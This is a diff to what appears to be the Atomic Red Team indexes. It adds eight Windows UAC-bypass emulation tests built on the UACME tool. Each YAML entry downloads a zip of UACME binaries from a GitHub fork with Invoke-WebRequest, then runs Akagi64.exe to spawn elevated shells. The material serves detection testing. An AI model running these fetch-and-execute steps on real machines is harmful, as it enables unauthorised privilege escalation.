diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 7b60dbb4..a906d524 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -152,6 +152,14 @@ privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocki
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -257,6 +265,14 @@ defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Tr
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index a999438f..000d0c60 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -100,6 +100,14 @@ privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocki
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -169,6 +177,14 @@ defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Tr
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 43d9385e..f7cfaaea 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -261,6 +261,14 @@
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
+ - Atomic Test #10: UACME Bypass Method 23 [windows]
+ - Atomic Test #11: UACME Bypass Method 31 [windows]
+ - Atomic Test #12: UACME Bypass Method 33 [windows]
+ - Atomic Test #13: UACME Bypass Method 34 [windows]
+ - Atomic Test #14: UACME Bypass Method 39 [windows]
+ - Atomic Test #15: UACME Bypass Method 56 [windows]
+ - Atomic Test #16: UACME Bypass Method 59 [windows]
+ - Atomic Test #17: UACME Bypass Method 61 [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -459,6 +467,14 @@
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
+ - Atomic Test #10: UACME Bypass Method 23 [windows]
+ - Atomic Test #11: UACME Bypass Method 31 [windows]
+ - Atomic Test #12: UACME Bypass Method 33 [windows]
+ - Atomic Test #13: UACME Bypass Method 34 [windows]
+ - Atomic Test #14: UACME Bypass Method 39 [windows]
+ - Atomic Test #15: UACME Bypass Method 56 [windows]
+ - Atomic Test #16: UACME Bypass Method 59 [windows]
+ - Atomic Test #17: UACME Bypass Method 61 [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index dd4daf5d..3a4a767c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -193,6 +193,14 @@
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
+ - Atomic Test #10: UACME Bypass Method 23 [windows]
+ - Atomic Test #11: UACME Bypass Method 31 [windows]
+ - Atomic Test #12: UACME Bypass Method 33 [windows]
+ - Atomic Test #13: UACME Bypass Method 34 [windows]
+ - Atomic Test #14: UACME Bypass Method 39 [windows]
+ - Atomic Test #15: UACME Bypass Method 56 [windows]
+ - Atomic Test #16: UACME Bypass Method 59 [windows]
+ - Atomic Test #17: UACME Bypass Method 61 [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -326,6 +334,14 @@
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
+ - Atomic Test #10: UACME Bypass Method 23 [windows]
+ - Atomic Test #11: UACME Bypass Method 31 [windows]
+ - Atomic Test #12: UACME Bypass Method 33 [windows]
+ - Atomic Test #13: UACME Bypass Method 34 [windows]
+ - Atomic Test #14: UACME Bypass Method 39 [windows]
+ - Atomic Test #15: UACME Bypass Method 56 [windows]
+ - Atomic Test #16: UACME Bypass Method 59 [windows]
+ - Atomic Test #17: UACME Bypass Method 61 [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 1b33c496..b952c8cc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -11348,6 +11348,290 @@ privilege-escalation:
command: "#{file_path}\n"
name: command_prompt
elevation_required: false
+ - name: UACME Bypass Method 23
+ auto_generated_guid: 8ceab7a2-563a-47d2-b5ba-0995211128d7
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Leo Davidson derivative\n\nType:\tDll Hijack\n\nMethod: IFileOperation\n\nTarget:\t\\system32\\pkgmgr.exe\n\nComponent:
+ DismCore.dll\n\nImplementation:\tucmDismMethod\n\nUCM Method:\tUacMethodDISM\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\23 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 31
+ auto_generated_guid: b0f76240-9f33-4d34-90e8-3a7d501beb15
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Enigma0x3\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\sdclt.exe\n\nComponent:
+ Attacker defined\n\nImplementation:\tucmSdcltIsolatedCommandMethod\n\nUCM
+ Method:\tUacMethodShellSdclt\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\31 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 33
+ auto_generated_guid: e514bb03-f71c-4b22-9092-9f961ec6fb03
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ winscripting.blog\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\fodhelper.exe\n\nComponent:\tAttacker
+ defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodMsSettings2\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\33 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 34
+ auto_generated_guid: 695b2dac-423e-448e-b6ef-5b88e93011d6
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ James Forshaw\n\nType:\tShell API\n\nMethod: Environment variables expansion\n\nTarget:\t\\system32\\svchost.exe
+ via \\system32\\schtasks.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDiskCleanupEnvironmentVariable\n\nUCM
+ Method:\tUacMethodDiskSilentCleanup\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\34 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 39
+ auto_generated_guid: 56163687-081f-47da-bb9c-7b231c5585cf
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Stefan Kanthak\n\nType:\tDll Hijack\n\nMethod: .NET Code Profiler\n\nTarget:\t\\system32\\mmc.exe\n\nComponent:\tAttacker
+ defined\n\nImplementation:\tucmCorProfilerMethod\n\nUCM Method:\tUacMethodCorProfiler\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\39 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 56
+ auto_generated_guid: 235ec031-cd2d-465d-a7ae-68bab281e80e
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Hashim Jawad\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\WSReset.exe\n\nComponent:\tAttacker
+ defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodShellWSReset\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\56 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 59
+ auto_generated_guid: dfb1b667-4bb8-4a63-a85e-29936ea75f29
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ James Forshaw\n\nType:\tAppInfo ALPC\n\nMethod: RAiLaunchAdminProcess and
+ DebugObject\n\nTarget:\tAttacker defined\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDebugObjectMethod\n\nUCM
+ Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\59 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 61
+ auto_generated_guid: 7825b576-744c-4555-856d-caf3460dc236
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Enigma0x3/bytecode77 derivative by Nassim Asrir\n\nType:\tShell API\n\nMethod:
+ Registry key manipulation\n\nTarget:\t\\system32\\slui.exe, \\system32\\changepk.exe\n\nComponent:\tAttacker
+ defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\61 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
T1574.012:
technique:
external_references:
@@ -20765,6 +21049,290 @@ defense-evasion:
command: "#{file_path}\n"
name: command_prompt
elevation_required: false
+ - name: UACME Bypass Method 23
+ auto_generated_guid: 8ceab7a2-563a-47d2-b5ba-0995211128d7
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Leo Davidson derivative\n\nType:\tDll Hijack\n\nMethod: IFileOperation\n\nTarget:\t\\system32\\pkgmgr.exe\n\nComponent:
+ DismCore.dll\n\nImplementation:\tucmDismMethod\n\nUCM Method:\tUacMethodDISM\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\23 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 31
+ auto_generated_guid: b0f76240-9f33-4d34-90e8-3a7d501beb15
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ Enigma0x3\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\sdclt.exe\n\nComponent:
+ Attacker defined\n\nImplementation:\tucmSdcltIsolatedCommandMethod\n\nUCM
+ Method:\tUacMethodShellSdclt\n\nhttps://github.com/hfiref0x/UACME\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ uacme_exe:
+ description: Path to uacme executable
+ type: Path
+ default: "%temp%\\uacme\\31 Akagi64.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
+
+'
+ prereq_command: |
+ $tempPath = cmd /c echo #{uacme_exe}
+ if (Test-Path "$tempPath") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+ Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
+ Remove-Item $env:TEMP\uacme.zip -Force
+ executor:
+ command: '"#{uacme_exe}"
+
+'
+ cleanup_command: |
+ powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
+ powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
+ name: command_prompt
+ - name: UACME Bypass Method 33
+ auto_generated_guid: e514bb03-f71c-4b22-9092-9f961ec6fb03
+ description: "Executes User Account Control Bypass according to the methods
+ listed below. Upon successful execution you should see event viewer load and
+ two administrative command prompts.\nNote: The cleanup_command's which kill
+ the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
+ winscripting.blog\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\fodhelper.exe\n\nComponent:\tAttacker
